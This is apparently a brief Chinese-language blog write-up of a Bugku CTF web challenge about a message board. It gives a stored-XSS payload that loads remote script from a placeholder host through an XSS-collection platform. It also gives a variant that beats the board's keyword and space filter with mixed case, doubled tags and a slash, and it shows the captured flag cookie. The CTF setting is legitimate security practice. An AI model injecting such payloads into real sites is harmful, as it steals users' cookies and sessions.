bugku WEB 留言板1

Posted Jan 1, 2023 Updated Oct 20, 2023

By lmds

1 min read

在xss.pt 注册一个账号，配置XSS

我们复制srcipt这一条

  
<sCRiPt sRC=//xx.xx/xxxx></sCrIpT>

我们会发现过滤了script和空格，进行其他代码尝试，会发现 ( ) 括号也进行了过滤

我们有大小写+双写可以过滤srcipt，空格使用反斜杠进行绕过

  
<sCRisCRiPtPt/sRC=//xx.xx/xxxx></sCrsCrIpTIpT>

测试情况

flag=flag%7B3f82f0d1288d080024d1ee51d4499228%7D;

flag{3f82f0d1288d080024d1ee51d4499228}

This post is licensed under CC BY 4.0 by the author.